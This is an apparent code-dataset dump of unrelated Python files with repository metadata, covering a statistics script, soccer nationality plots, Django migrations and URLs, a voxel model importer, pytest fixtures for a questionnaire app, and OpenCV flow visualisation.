import numpy as np
a = [11, 16, 14, 19, 1, 13, 15, 15, 2, 6, 4, 20, 17, 8, 18, 22, 25, 11, 18, -7]
b = [17, 15, 7, 12, 5, 20, 18, 22, 11, 2, 9, 0, 10, 11, 6, 17, 9, 10, 6]
c = [6, 16, 1, 6, 14, 5, 5, 15, 6, 11, 8, 15, 10, 3, 15, 10, 5, 14, 17, 13]
d = a+b+c
def mean(list):
    """Return the arithmetic mean of *list*.

    Raises ZeroDivisionError for an empty list.  The parameter shadows the
    builtin ``list``; kept as-is for call compatibility.
    """
    return sum(list) / len(list)
def median(list):
    """Return the median of *list* without mutating the caller's data.

    For an even number of elements the mean of the two middle values is
    returned (always a float in that case).  The original implementation
    sorted the list in place, silently reordering the caller's data; we
    sort a copy instead.  Raises IndexError for an empty list.
    """
    ordered = sorted(list)
    return (ordered[(len(ordered) - 1) // 2] + ordered[len(ordered) // 2]) / 2
def single_mode(list):
    """Return the most frequent element of *list*.

    When several elements tie for the highest count, the one appearing
    earliest in the list wins.  Raises ValueError for an empty list.
    """
    frequency = {}
    for value in list:
        frequency[value] = frequency.get(value, 0) + 1
    return max(list, key=frequency.get)
def mode(l):
    """Return every element of *l* that shares the highest frequency.

    The result preserves first-appearance order; an empty input yields an
    empty list.  Replaces the original hand-rolled counting loop with
    collections.Counter, which produces identical results.
    """
    from collections import Counter  # local import: module header is untouched
    if not l:
        return []
    counts = Counter(l)
    highest = max(counts.values())
    return [value for value, count in counts.items() if count == highest]
def my_stdev(l):
    """Return the population standard deviation of *l*.

    Computed as the square root of the mean squared deviation from the
    average.  Raises ZeroDivisionError for an empty list.
    """
    average = sum(l) / len(l)
    squared_deviations = [(value - average) ** 2 for value in l]
    return (sum(squared_deviations) / len(l)) ** 0.5
print(mean(a))
print(mean(b))
print(mean(c))
print(single_mode(a))
print(single_mode(b))
print(single_mode(c))
print(mode(a))
print(mode(b))
print(mode(c))
print(median(a))
print(median(b))
print(median(c))
print(mean(d))
print(my_stdev(d))
print(np.std(d)) | [
"williamy330@gmail.com"
] | williamy330@gmail.com |
66a564f0ce6fffe5cbf5bd290c3ec0ee367c35ff | bb46e44301da95b8ed1b2b3af6caf8ef6f0e91f2 | /scripts/NationalityCalculator.py | c2f92c72943e5a7a3db782d1e1dce71948b0f88f | [] | no_license | vgoel30/European-Soccer-Diversity | ccca31a2233e19cd304d5c3d7cb80413d01aa359 | a62364e3876cecf074a8aee2ea8976bf7a9c5576 | refs/heads/master | 2021-03-24T13:20:22.569083 | 2018-06-10T10:48:31 | 2018-06-10T10:48:31 | 117,543,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,027 | py | from pprint import pprint
import json
import pandas as pd
from sklearn import preprocessing
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import math
def plot_time_series(df, title):
    """Show *df* as a line chart with markers; y-axis clamped to 0..50.

    :param df: DataFrame indexed by year, one line per column
    :param title: chart title
    """
    #plot graph
    ax = df.plot(figsize=(12,8),marker='o')
    #set title
    plt.title(title, fontsize=13)
    #set ticks rotation
    plt.xticks(rotation=50)
    ax.set_ylabel('Percentages')
    ax.set_ylim(top=50)
    ax.set_ylim(bottom=0)
    plt.show()
def minutes_parser(minutes_string):
    """Convert a minutes string such as "90'" or "1.234'" into an int.

    The placeholder '-' means no minutes played and maps to 0.  Apostrophes
    and thousands-separator dots are stripped before conversion.
    """
    if minutes_string == '-':
        return 0
    digits = minutes_string.translate(str.maketrans('', '', "'."))
    return int(digits)
def get_nationalities_df():
    """Build a DataFrame of player-nationality shares per season.

    For each year 1995-2016, counts per league file how many players hold
    one of the five big-league nationalities, divides by the total number
    of players seen that year and scales to percent.  Rows are indexed by
    year (string), columns are countries.

    NOTE(review): each '<country>/2016.json' file appears to be a snapshot
    containing data for all seasons (keyed by year) — confirm that this
    hard-coded file name is intentional.
    """
    years = [str(year) for year in range(1995, 2017)]
    countries = ['England', 'France', 'Germany', 'Italy', 'Spain']
    final_data = []
    # one zero-initialised row of per-year counts per country
    for country in countries:
        final_data.append([])
        for year in years:
            final_data[-1].append(0)
    for year in years:
        total = 0
        for country in countries:
            data_file = '../data/Leistungsdaten/' + str(country) + '/2016.json'
            with open(data_file) as datafile:
                data = json.load(datafile)
            #data for a particular year
            league_year_data = data[year]
            #go through each team in the year
            for team in league_year_data:
                year_data = data[year][team]
                #each player
                for key in year_data:
                    player = year_data[key]
                    player_country = player['nationality']
                    if player_country in countries:
                        final_data[countries.index(player_country)][int(year) - 1995] += 1
                    # total counts every player, regardless of nationality
                    total += 1
        # convert this year's counts into percentages of all players
        for country in countries:
            final_data[countries.index(country)][int(year) - 1995] /= total
            final_data[countries.index(country)][int(year) - 1995] *= 100
    L_all_data = final_data
    df = pd.DataFrame({'England': L_all_data[0],
                       'France': L_all_data[1],
                       'Germany': L_all_data[2],
                       'Italy' : L_all_data[3],
                       'Spain' : L_all_data[4],
                       'Year': years })
    df = df.set_index('Year')
    return df
df = get_nationalities_df()
pprint(df)
plot_time_series(df, 'Percentage of nationalies') | [
"varun.goel@stonybrook.edu"
] | varun.goel@stonybrook.edu |
b366b7434089c0ba3d1eb986f724eeeaa900c568 | b2cfb6de4d1a4a00ac11d1aabab3caa485c8ecb9 | /sodp/reports/migrations/0020_auto_20210805_1639.py | 1984c338693fd39179fcd0a21ed21cfdebc7efb0 | [
"Apache-2.0"
] | permissive | ElHombreMorado8/sodp | d80c6057b68c7edb843f37b4bd2dcfa6638ab6f6 | e4a05620b633d261b22025af1d488cf767ba2e30 | refs/heads/main | 2023-07-17T08:19:10.352314 | 2021-09-02T17:18:37 | 2021-09-02T17:39:09 | 394,760,640 | 0 | 0 | Apache-2.0 | 2021-08-10T19:28:20 | 2021-08-10T19:28:19 | null | UTF-8 | Python | false | false | 900 | py | # Generated by Django 3.1.12 on 2021-08-05 16:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration: creates the reportURL table with a
    # CASCADE foreign key to reports.report.
    # NOTE(review): this depends on '0017_auto_20210728_2110' although the
    # file name suggests migration 0020 — confirm 0018/0019 are unrelated
    # branches before editing the dependency graph.
    dependencies = [
        ('reports', '0017_auto_20210728_2110'),
    ]
    operations = [
        migrations.CreateModel(
            name='reportURL',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('url', models.CharField(blank=True, max_length=100, null=True, verbose_name='url')),
                ('is_accepted_status', models.CharField(blank=True, choices=[('accept', 'Accept'), ('block', 'Block')], default='', max_length=6)),
                ('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report', to='reports.report', verbose_name='report')),
            ],
        ),
    ]
| [
"80881547+calderonIrene@users.noreply.github.com"
] | 80881547+calderonIrene@users.noreply.github.com |
b79f13ac51c19583f174cc30d4120446bd7b7960 | 3c1225978cddb35d92969f8b5c2cb12d238d345a | /LayerModel_lib/voxelmodel_importer.py | 9af583845d75bb68bce846dd32f0efac1cfe8587 | [
"MIT"
] | permissive | janbrumm/layermodel_lib | 4f08e0b1e81169ee9cc707b5d7fac9457cc74bc2 | 0d5e0c9ac77d302910823ebc757a4ec99541f3ff | refs/heads/master | 2020-06-03T22:32:14.505315 | 2020-02-18T16:06:46 | 2020-02-18T16:06:46 | 191,758,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,722 | py | # This file is part of LayerModel_lib
#
# A tool to compute the transmission behaviour of plane electromagnetic waves
# through human tissue.
#
# Copyright (C) 2018 Jan-Christoph Brumm
#
# Licensed under MIT license.
#
import numpy as np
import logging
from typing import Dict, Tuple
from os import listdir
from os.path import isfile, join
from typing import Optional
from LayerModel_lib.tissue_properties import TissueProperties
from LayerModel_lib.voxelmodel import VoxelModel
from LayerModel_lib.general import ProgressBarConfig as pb
class VoxelModelImporter:
"""
A class to import the AustinMan/AustinWoman models in txt-format or the models provided by the
Helmholtz Zentrum München.
"""
def __init__(self, data_filename: str, tissue_mapping_file: str, file_type: str,
show_progress: Optional[bool]=False):
"""
Create a new importing instance
:param data_filename:
:param tissue_mapping_file: A file which describes the tissue mapping to our tissue IDs
:param file_type:
:param show_progress:
"""
self.data = {}
self.tissue_names = []
self.tissue_mapping = np.zeros(shape=(0,))
# can be activated to show a progress bar in the console
self.show_progress_bar = show_progress
if file_type == 'AVW':
self.read_tissue_mapping(tissue_mapping_file)
self.load_avw_file(data_filename)
elif file_type == 'TXT':
self.read_tissue_mapping(tissue_mapping_file)
self.load_from_txt_files(data_filename)
@staticmethod
def calculate_outer_shape(model: np.ndarray, tissue_mapping: np.ndarray=None) -> Dict:
"""
Calculate the outer_shape of the model, using the optional tissue_mapping to find all skin tissues.
:param model: np.ndarray containing the voxel data
:param tissue_mapping: np.ndarray defining the mapping of tissue IDs in the model
to the tissue IDs in TissueProperties
:return: Dictionary containing the 'front' and 'right' view of the contour of the model.
"""
# get the ids of all the tissues which contain skin in their name
skin_ids_TissueProperties = [i for (i, s) in enumerate(TissueProperties().tissue_names) if 'skin' in s.lower()]
if tissue_mapping is None:
skin_ids = skin_ids_TissueProperties
else:
# if there is a mapping we have to look up the original ids in the mapping table
skin_ids = [i for (i, m) in enumerate(tissue_mapping) if m in skin_ids_TissueProperties]
# set the values of the skin_ids to one
model_binary = np.zeros(model.shape)
for i in skin_ids:
model_binary[np.nonzero(model == i)] = 1
outer_shape = {'front': np.sum(model_binary, axis=0),
'right': np.sum(model_binary, axis=1)}
return outer_shape
@staticmethod
def calculate_trunk_model(voxel_model: VoxelModel, model_type: str, z_start: int, z_end: int)\
-> Tuple[np.ndarray, Dict]:
"""
Calculate the trunk model
the slice z_end will not be included in the final model
:param voxel_model: the voxel model that is converted to a trunk only model
:param model_type: the model_type that is used as basis for the conversion
:param z_start: start slice
:param z_end: end slice (not included)
"""
logging.info("Calculate the trunk model..")
model_trunk = voxel_model.models[model_type][:, :, z_start:z_end]
model_trunk = voxel_model.remove_arms(model_trunk)
mask_trunk = {'x': range(0, model_trunk.shape[0]),
'y': range(0, model_trunk.shape[1]),
'z': range(z_start, z_end)}
return model_trunk, mask_trunk
def read_tissue_mapping(self, tissue_mapping_file: str):
"""
Read in the tissue mapping text file. The file has to be formatted the following way:
ID,Tissue Name, Assigned Tissue Name
0, ExternalAir, ExternalAir
250, Some Fat, Fat
The assigned tissue name has to have the same spelling has the tissue in TissueProperties.
:param tissue_mapping_file: Filename of the tissue mapping text file
:return:
"""
# empty temp list for storing all tissues in the file
# each entry will be a tuple: (ID, Tissue Name, Assigned Tissue Name)
tissues_temp = []
# store the maximum tissue id
max_t_id = 0
with open(tissue_mapping_file) as datafile:
for row in datafile:
try:
(t_id, name, assigned_tissue) = row.split(',')
except ValueError as e:
logging.error("ValueError in row: %s" % row)
if t_id.isdigit():
t_id = int(t_id)
if t_id > max_t_id:
max_t_id = t_id
name = name.strip()
assigned_tissue = assigned_tissue.strip()
tissues_temp.append((t_id, name, assigned_tissue))
# look up the assigned_tissues in the TissueProperties.
tp = TissueProperties()
self.tissue_names = ['' for x in range(max_t_id + 1)]
self.tissue_mapping = np.zeros(max_t_id + 1, dtype=int)
for (t_id, name, assigned_tissue) in tissues_temp:
self.tissue_names[t_id] = name
self.tissue_mapping[t_id] = tp.get_id_for_name(assigned_tissue).astype(int)
def load_avw_file(self, avw_file: str):
"""
Read in the contents of an AnalyzeAVW file, as they are distributed by the Helmholtz Zentrum München.
:param avw_file:
:return:
"""
logging.info("Read the data from an AVW file")
# store the offset of the voxel data from the header
voxel_offset = 0
with open(avw_file, 'r') as f:
if self.show_progress_bar:
pb.progress_bar.max_value = len(f)
for (line_number, line) in enumerate(f):
if self.show_progress_bar:
pb.progress_bar.update(line_number + 1)
# Read the header data until the line 'EndInformation' is reached
if 'EndInformation' in line:
break
# first line has to contain 'AVW_ImageFile'
if line_number == 0:
if 'AVW_ImageFile' not in line:
raise TypeError('%s is not in AVW format' % avw_file)
else:
# read the offset for the beginning of the binary voxel data
voxel_offset = int(line.split()[2])
# All the other lines contain information on the voxel data
if '=' in line: # there is a name=value pair in this line
line_splt = line.split('=')
name = line_splt[0].strip()
value = line_splt[1].strip()
if value.isnumeric():
if value.isdigit():
value = int(value)
else:
value = float(value)
else:
value = value.strip('"')
try:
self.data[name] = value
except KeyError:
logging.error('Failed to set avw_data[%s] to %s' % (name, value))
if self.show_progress_bar:
pb.progress_bar.finish()
if voxel_offset != 0:
# Read in the voxel data starting at voxel_offset
with open(avw_file, 'rb') as f:
f.seek(voxel_offset)
data_size = self.data['Height'] * self.data['Width'] * self.data['Depth']
shape = (self.data['Width'], self.data['Height'], self.data['Depth'])
self.data['image'] = np.reshape(np.fromfile(avw_file, dtype=np.uint8, count=data_size),
newshape=shape,
order='F')
# the voxel data needs to be transposed to fit to our coordinate system
self.data['image'] = np.transpose(self.data['image'], (1, 0, 2))
else:
raise FileNotFoundError('Error reading the AVW file')
def load_from_txt_files(self, txt_files_dir: str):
"""
Read in the data from txt files as provided by the AustinMan/Woman models
:param txt_files_dir:
:return:
"""
logging.info("Read in the data from txt files..")
def is_numeric_file(x: str) -> bool:
# check if x is numeric, excluding the last 4 characters ('.txt')
try:
int(x[0:-4])
return True
except ValueError:
return False
def sorting_key(x: str) -> int:
return int(x[0:-4])
file_list = [f for f in listdir(txt_files_dir) if isfile(join(txt_files_dir, f)) and is_numeric_file(f)]
file_list.sort(key=sorting_key)
# read in the scaling and the extent of the data
with open(join(txt_files_dir, 'input.txt'), 'r') as f:
line = f.readline().split()
x_extent = int(line[0])
self.data['scale'] = {'x': float(line[1])*1e3}
line = f.readline().split()
y_extent = int(line[0])
self.data['scale']['y'] = float(line[1])*1e3
line = f.readline().split()
z_extent = int(line[0])
self.data['scale']['z'] = float(line[1])*1e3
Model_orig = np.zeros([x_extent, y_extent, z_extent], dtype=np.uint8)
if self.show_progress_bar:
pb.progress_bar.max_value = len(file_list)
# read in the data from all the files
for (k, file) in enumerate(file_list):
if self.show_progress_bar:
pb.progress_bar.update(k+1)
with open(join(txt_files_dir, file)) as datafile:
data = datafile.read()
# split the content of each file to single numbers
data = np.array(data.split())
# convert to int
data = data.astype(np.uint8)
# make it a 2D array again
data = data.reshape((y_extent, -1))
Model_orig[:, :, k] = data.transpose()
if self.show_progress_bar:
pb.progress_bar.finish()
self.data['image'] = Model_orig
| [
"jan.brumm@tuhh.de"
] | jan.brumm@tuhh.de |
f47a7b12a982753bb78e4c6384d7afa40c7b1a7c | 59be53d962745ea78a16ab02b5c2c50fba2bdac5 | /ser/migrations/0010_auto_20191223_1645.py | 903022cf696025ce759366d5b7a14e2505a0ae92 | [] | no_license | parth1208/kindcare_django | f8fff73b1b80e246f34337989e3f83629a91995e | f0f919c9db53f1b3d247c1f93f33ef7a4bd9ac20 | refs/heads/master | 2020-09-13T03:15:08.253283 | 2020-04-11T09:27:16 | 2020-04-11T09:27:16 | 222,639,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # Generated by Django 2.2.6 on 2019-12-23 11:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ser', '0009_service_list'),
]
operations = [
migrations.RenameModel(
old_name='Service_list',
new_name='servant',
),
]
| [
"parthmangukiya1208@gmail.com"
] | parthmangukiya1208@gmail.com |
3417d38c711c232d09855c1a6c8a217797541729 | 73bb7a5dc600c1b31d70492b5d05865ab27faaef | /python datastructure/linearsearch.py | 4a19627b6c0e7a9ff935a20fda37818b23525f2f | [] | no_license | Karthicksaga/python-Exercise | eb96966e415aea5996ed39bf283cb9d0c49952c9 | 96fd175dd706b7b75cdf49f7ebcaceb8324084ca | refs/heads/master | 2022-12-01T22:46:27.382688 | 2020-08-20T15:40:21 | 2020-08-20T15:40:21 | 289,044,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | def linearsearch(arr , key):
for i in range (len(arr) ):
if (arr[i] == key):
return i
return -1
a = [134,54,3,233,45,44]
print("Element present at the index " , linearsearch(a , 45))
| [
"noreply@github.com"
] | Karthicksaga.noreply@github.com |
4c4325dee0e093de38777c500d916616aba20fa1 | 0cc4314142cd2f7150ce0fd8500bf09894e2f185 | /python_docker_sample/__init__.py | 7599b14d17b8774f8e71108d635ad2275dc46527 | [] | no_license | xnuinside/python-docker-sample | b99500aa4ce74aec56f89aacf188b2de8a437aa6 | 5c0f10f24485f9451df2939c8c11cbe36e56f081 | refs/heads/main | 2023-03-01T02:47:21.738127 | 2021-02-09T10:03:35 | 2021-02-09T10:03:35 | 337,347,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | import os
import logging
import urllib.parse
import psycopg2
logger = logging.getLogger(__name__)
def test_db_connection():
db_pass = urllib.parse.quote(os.environ.get("DB_PASS", ""))
conn = psycopg2.connect(
host=os.environ.get("DB_HOST"),
dbname=os.environ.get("DB_NAME"),
user=os.environ.get("DB_USER"),
password=db_pass,
port=os.environ.get("DB_PORT"))
cur = conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS test (id serial PRIMARY KEY, num integer, data varchar);")
logger.info('Connected to PostgreSQL database')
test_db_connection()
| [
"iuliia_volkova2@epam.com"
] | iuliia_volkova2@epam.com |
145a7de1d16839c1e3d3043e3317c6296661ca39 | bc12bd18b3bc9abb01e5263be3dbef241b549d31 | /setup.py | 9f77f01d4f1e51c8899ca5d043ebcb0758f86d74 | [
"MIT"
] | permissive | codeforkansascity/clear_my_record_backend | f4f57586de597bc5adfb3014f1348304bf197265 | ecd17c5af304d5b2c7f08482af22e4007c5da137 | refs/heads/master | 2023-01-04T03:41:08.676018 | 2019-04-24T22:19:55 | 2019-04-24T22:19:55 | 172,596,270 | 4 | 2 | MIT | 2022-12-27T15:34:06 | 2019-02-25T22:35:11 | Python | UTF-8 | Python | false | false | 109 | py | from setuptools import setup, find_packages
setup(name="clear_my_record_backend", packages=find_packages())
| [
"noreply@github.com"
] | codeforkansascity.noreply@github.com |
e63d305aeed1b484607f2ee5d3935c2464a2696d | a68e8f2c6092374adf05b88de99092ab99c3fb76 | /firstProject/urls.py | 61da1e514f93e16c29bd2850ada2a422564fdda7 | [] | no_license | inomesh/django | b3a2f5de5f7607c7deb07501a9b454ffa46bf512 | bad4cee930c9ce04f6c3e6267676f59e4f85a3b7 | refs/heads/main | 2022-12-29T16:36:37.660826 | 2020-10-19T12:55:10 | 2020-10-19T12:55:10 | 303,076,626 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,444 | py | """firstProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from accounts.views import (
login_view,
logout_view,
register_view,
)
from products.views import (
home_view,
search_view,
Product_detail_view,
Product_api_detail_view,
Product_list_view,
product_create_view,
)
urlpatterns = [
path('',home_view),
path('login/',login_view),
path('accounts/login/',login_view),
path('logout/',logout_view),
path('register/',register_view),
path('search/',search_view),
path('products/',Product_list_view),
path('products/<int:pk>/',Product_detail_view),
# path('products/1/',Product_detail_view),
path('forms/',product_create_view),
path('api/products/<int:pk>/',Product_api_detail_view),
path('admin/', admin.site.urls)
]
| [
"nomesh.sehgal@gmail.com"
] | nomesh.sehgal@gmail.com |
6eab6235773fadc371788dc6921ac27ab34d157e | 6f866eb49d0b67f0bbbf35c34cebe2babe2f8719 | /tests/app/views/handlers/conftest.py | 8ac724a725dc9f88afecffd8b9b45dc2787c076c | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | ONSdigital/eq-questionnaire-runner | 681b0d081f9cff0ee4ae3017ecc61f7390d553bf | 87e7364c4d54fee99e6a5e96649123f11c4b53f1 | refs/heads/main | 2023-09-01T21:59:56.733363 | 2023-08-31T15:07:55 | 2023-08-31T15:07:55 | 219,752,509 | 12 | 18 | MIT | 2023-09-14T11:37:31 | 2019-11-05T13:32:18 | Python | UTF-8 | Python | false | false | 7,411 | py | import uuid
from datetime import datetime, timedelta, timezone
import pytest
from freezegun import freeze_time
from mock import Mock
from app.authentication.auth_payload_versions import AuthPayloadVersion
from app.data_models import QuestionnaireStore
from app.data_models.metadata_proxy import MetadataProxy
from app.data_models.session_data import SessionData
from app.data_models.session_store import SessionStore
from app.questionnaire import QuestionnaireSchema
from tests.app.parser.conftest import get_response_expires_at
time_to_freeze = datetime.now(timezone.utc).replace(second=0, microsecond=0)
tx_id = str(uuid.uuid4())
response_id = "1234567890123456"
period_str = "2016-01-01"
period_id = "2016-02-01"
ref_p_start_date = "2016-02-02"
ref_p_end_date = "2016-03-03"
ru_ref = "432423423423"
ru_name = "ru_name"
user_id = "789473423"
schema_name = "1_0000"
feedback_count = 1
display_address = "68 Abingdon Road, Goathill"
form_type = "I"
collection_exercise_sid = "ce_sid"
case_id = "case_id"
survey_id = "021"
data_version = "0.0.1"
feedback_type = "Feedback type"
feedback_text = "Feedback text"
feedback_type_question_category = "Feedback type question category"
started_at = str(datetime.now(tz=timezone.utc).isoformat())
language_code = "cy"
case_type = "I"
channel = "H"
case_ref = "1000000000000001"
region_code = "GB_WLS"
response_expires_at = get_response_expires_at()
@pytest.fixture
@freeze_time(time_to_freeze)
def session_data():
return SessionData(
language_code="cy",
)
@pytest.fixture
def confirmation_email_fulfilment_schema():
return QuestionnaireSchema(
{
"form_type": "H",
"region_code": "GB-WLS",
"submission": {"confirmation_email": True},
}
)
@pytest.fixture
def language():
return "en"
@pytest.fixture
def schema():
return QuestionnaireSchema(
{
"post_submission": {"view_response": True},
"title": "Test schema - View Submitted Response",
}
)
@pytest.fixture
def storage():
return Mock()
def set_storage_data(
storage_,
raw_data="{}",
version=1,
submitted_at=None,
):
storage_.get_user_data = Mock(
return_value=(raw_data, version, collection_exercise_sid, submitted_at)
)
@pytest.fixture
def session_data_feedback():
return SessionData(
language_code=language_code,
feedback_count=feedback_count,
)
@pytest.fixture
def schema_feedback():
return QuestionnaireSchema({"survey_id": survey_id, "data_version": data_version})
@pytest.fixture
def metadata():
return MetadataProxy.from_dict(
{
"tx_id": tx_id,
"user_id": user_id,
"schema_name": schema_name,
"collection_exercise_sid": collection_exercise_sid,
"period_id": period_id,
"period_str": period_str,
"ref_p_start_date": ref_p_start_date,
"ref_p_end_date": ref_p_end_date,
"ru_ref": ru_ref,
"response_id": response_id,
"form_type": form_type,
"display_address": display_address,
"case_type": case_type,
"channel": channel,
"case_ref": case_ref,
"region_code": region_code,
"case_id": case_id,
"language_code": language_code,
"response_expires_at": response_expires_at,
}
)
@pytest.fixture
def metadata_v2():
return MetadataProxy.from_dict(
{
"version": AuthPayloadVersion.V2,
"tx_id": tx_id,
"case_id": case_id,
"schema_name": schema_name,
"collection_exercise_sid": collection_exercise_sid,
"response_id": response_id,
"channel": channel,
"region_code": region_code,
"account_service_url": "account_service_url",
"response_expires_at": get_response_expires_at(),
"survey_metadata": {
"data": {
"period_id": period_id,
"period_str": period_str,
"ref_p_start_date": ref_p_start_date,
"ref_p_end_date": ref_p_end_date,
"ru_ref": ru_ref,
"ru_name": ru_name,
"case_type": case_type,
"form_type": form_type,
"case_ref": case_ref,
"display_address": display_address,
"user_id": user_id,
}
},
}
)
@pytest.fixture
def response_metadata():
return {
"started_at": started_at,
}
@pytest.fixture
def submission_payload_expires_at():
return datetime.now(timezone.utc) + timedelta(seconds=5)
@pytest.fixture
def submission_payload_session_data():
return SessionData(
language_code="cy",
)
@pytest.fixture
def submission_payload_session_store(
submission_payload_session_data,
submission_payload_expires_at,
): # pylint: disable=redefined-outer-name
return SessionStore("user_ik", "pepper", "eq_session_id").create(
"eq_session_id",
"user_id",
submission_payload_session_data,
submission_payload_expires_at,
)
@pytest.fixture
def mock_questionnaire_store(mocker):
storage_ = mocker.Mock()
storage_.get_user_data = mocker.Mock(return_value=("{}", "ce_id", 1, None))
questionnaire_store = QuestionnaireStore(storage_)
questionnaire_store.metadata = MetadataProxy.from_dict(
{
"tx_id": "tx_id",
"case_id": "case_id",
"ru_ref": ru_ref,
"user_id": user_id,
"collection_exercise_sid": collection_exercise_sid,
"period_id": period_id,
"schema_name": schema_name,
"account_service_url": "account_service_url",
"response_id": "response_id",
"response_expires_at": get_response_expires_at(),
}
)
return questionnaire_store
@pytest.fixture
def mock_questionnaire_store_v2(mocker):
storage_ = mocker.Mock()
storage_.get_user_data = mocker.Mock(return_value=("{}", "ce_id", 1, None))
questionnaire_store = QuestionnaireStore(storage_)
questionnaire_store.metadata = MetadataProxy.from_dict(
{
"version": AuthPayloadVersion.V2,
"tx_id": "tx_id",
"case_id": case_id,
"schema_name": schema_name,
"collection_exercise_sid": collection_exercise_sid,
"response_id": response_id,
"channel": channel,
"region_code": region_code,
"account_service_url": "account_service_url",
"response_expires_at": get_response_expires_at(),
"survey_metadata": {
"data": {
"period_id": period_id,
"period_str": period_str,
"ref_p_start_date": ref_p_start_date,
"ref_p_end_date": ref_p_end_date,
"ru_ref": ru_ref,
"ru_name": ru_name,
"case_type": case_type,
"form_type": form_type,
"case_ref": case_ref,
"display_address": display_address,
"user_id": user_id,
}
},
}
)
return questionnaire_store
| [
"noreply@github.com"
] | ONSdigital.noreply@github.com |
d4fe8e6fe210d8669eb229701c04aea112388cb0 | bc3371741f17db72556849a0ca7003774a5d4c79 | /utils/show_with_pattern.py | 9f4b6a2d9329447a37bb2421015ee08086d07a34 | [] | no_license | laura-wang/video_repres_sts | 659067699c4b714933b6d493cb0fc2df65760d06 | e79986b4af749e467476abff7c9ce99c1f8a6a8b | refs/heads/master | 2023-03-02T14:00:00.678042 | 2021-02-09T03:01:48 | 2021-02-09T03:01:48 | 262,689,178 | 48 | 9 | null | 2021-02-09T03:01:50 | 2020-05-10T01:17:57 | Python | UTF-8 | Python | false | false | 3,229 | py | import cv2
from utils.show_flow import computeImg
import numpy as np
def show_pattern_1(img):
cv2.line(img, (0, 28), (112, 28), color=(0, 255, 0))
cv2.line(img, (0, 56), (112, 56), color=(0, 255, 0))
cv2.line(img, (0, 84), (112, 84), color=(0, 255, 0))
cv2.line(img, (28, 0), (28, 112), color=(0, 255, 0))
cv2.line(img, (56, 0), (56, 112), color=(0, 255, 0))
cv2.line(img, (84, 0), (84, 112), color=(0, 255, 0))
cv2.imshow('pattern 1', img)
cv2.waitKey()
def show_pattern_2(img):
cv2.rectangle(img, (14, 14), (98, 98), (0, 255, 0))
cv2.rectangle(img, (28, 28), (84, 84), (0, 255, 0))
cv2.rectangle(img, (42, 42), (70, 70), (0, 255, 0))
cv2.imshow('pattern 2', img)
cv2.waitKey()
def show_pattern_3(img):
cv2.line(img, (0, 0), (112, 112), color=(0, 255, 0))
cv2.line(img, (112, 0), (0, 112), color=(0, 255, 0))
cv2.line(img, (56, 0), (56, 112), color=(0, 255, 0))
cv2.line(img, (0, 56), (112, 56), color=(0, 255, 0))
# cv2.line(img, (0, 56), (112, 56), color=(0, 255, 0))
# cv2.line(img, (0, 84), (112, 84), color=(0, 255, 0))
#
# cv2.line(img, (28, 0), (28, 112), color=(0, 255, 0))
# cv2.line(img, (56, 0), (56, 112), color=(0, 255, 0))
# cv2.line(img, (84, 0), (84, 112), color=(0, 255, 0))
cv2.imshow('pattern 3', img)
cv2.waitKey()
def show(sample_batched):
# video clip: 3 x 16 x 112 x 112
# flow: 15 x 112 x 112
video_clip, u_flow_15, v_flow_15, motion_labels, du, dv= sample_batched['clip'][0], sample_batched['u_flow'][0], sample_batched['v_flow'][0], \
sample_batched['motion_label'][0] , sample_batched['du'], sample_batched['dv']
video_clip = np.transpose(video_clip, (1, 2, 3, 0))
## dv
du_x_sum = du['du_x_sum'][0].numpy()
du_y_sum = du['du_y_sum'][0].numpy()
motion_labels = motion_labels.numpy()
mb_u_sum = computeImg(du_x_sum, du_y_sum)
print("u pattern 1:", motion_labels[0])
show_pattern_1(mb_u_sum.copy())
print("u pattern 2:", motion_labels[4])
show_pattern_2(mb_u_sum.copy())
print("u pattern 3:", motion_labels[8])
show_pattern_3(mb_u_sum.copy())
## dv
dv_x_sum = dv['dv_x_sum'][0].numpy()
dv_y_sum = dv['dv_y_sum'][0].numpy()
mb_v_sum = computeImg(dv_x_sum, dv_y_sum)
print("v pattern 1:", motion_labels[2])
show_pattern_1(mb_v_sum.copy())
print("v pattern 2:", motion_labels[6])
show_pattern_2(mb_v_sum.copy())
print("v pattern 3:", motion_labels[10])
show_pattern_3(mb_v_sum.copy())
## global
print("global u:", motion_labels[-2])
print("global v:", motion_labels[-1])
print("motion label:", motion_labels[:])
for i in range(15):
cur_video_clip = video_clip[i].numpy()
cv2.imshow("flip img", cur_video_clip)
cur_u_flow = u_flow_15[i].numpy()
cur_v_flow = v_flow_15[i].numpy()
cur_flow = computeImg(cur_u_flow, cur_v_flow)
cv2.imshow('flow', cur_flow)
cv2.waitKey()
| [
"noreply@github.com"
] | laura-wang.noreply@github.com |
3dc4c09fb5506a33933c0f69ed47ea51604b13d2 | 5102f7b8a300186496ce7691c6135efeeaeedd6c | /jobplus/app.py | 8fefd43ae3d75fa52ccf45f67da58614eba6ec85 | [] | no_license | ISONEK/jobplus10-3 | c0bc4ddfca67e54b5015cd9b1bfbfb2499338209 | b595e3c53ced93efa7883c67a4633132b5f52c15 | refs/heads/master | 2022-10-20T20:53:15.506235 | 2019-02-25T14:05:14 | 2019-02-25T14:05:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | from flask import Flask
from flask_migrate import Migrate
from .config import configs
